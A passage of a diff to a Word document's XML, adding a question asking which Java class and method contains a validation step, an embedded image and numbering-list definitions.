+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>exploitation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. In </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>which</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Java</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>class</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>method</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>was</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>this</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>validation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>step</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>added</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E6FE4DB" wp14:editId="730D043D">
+            <wp:extent cx="5943600" cy="2899410"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="130342749" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="130342749" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2899410"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
@@ -1958,6 +4723,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0B9B57DA"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="3878B192"/>
+    <w:lvl w:ilvl="0" w:tplc="042A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="15050C67"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0270C3FE"/>
@@ -2106,7 +4960,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1DF91759"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F5682A66"/>
@@ -2195,7 +5049,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="26B368AC"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="511E4A4A"/>
@@ -2284,7 +5138,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2D9970CC"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E1BEF402"/>
@@ -2373,7 +5227,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="355A699E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BDB43978"/>
@@ -2486,7 +5340,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="391F0EC7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="42762854"/>
@@ -2575,7 +5429,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="39FD4D14"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="5A7844BE"/>
@@ -2664,7 +5518,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="43A13D51"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E7D47694"/>
@@ -2753,7 +5607,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4D9E6130"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A562174C"/>
@@ -2842,7 +5696,185 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="5B8B257D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="1DC8F8C4"/>
+    <w:lvl w:ilvl="0" w:tplc="042A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="5D386D64"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="808E3898"/>
+    <w:lvl w:ilvl="0" w:tplc="042A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="61467E13"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6328867E"/>
@@ -2931,7 +5963,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="621B7151"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B70825B4"/>
@@ -3020,7 +6052,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="69325FAC"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BB202B96"/>
@@ -3109,7 +6141,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="72D47679"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="52BA0EBC"/>
@@ -3198,7 +6230,96 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7B3A259B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="1D024BE6"/>
+    <w:lvl w:ilvl="0" w:tplc="042A000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="042A000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="042A0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="042A001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7BAF333F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A51CB8AA"/>
@@ -3287,7 +6408,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7CA819CB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C8608D64"/>
@@ -3377,61 +6498,73 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="291836206">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="21"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1548486912">
-    <w:abstractNumId w:val="18"/>
+    <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1719277772">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="109207748">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1658606306">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1439638879">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1895893239">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="19"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="1481071401">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="1369258797">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="1313368772">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="403534401">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="12" w16cid:durableId="774137663">
+    <w:abstractNumId w:val="16"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="2102406101">
     <w:abstractNumId w:val="13"/>
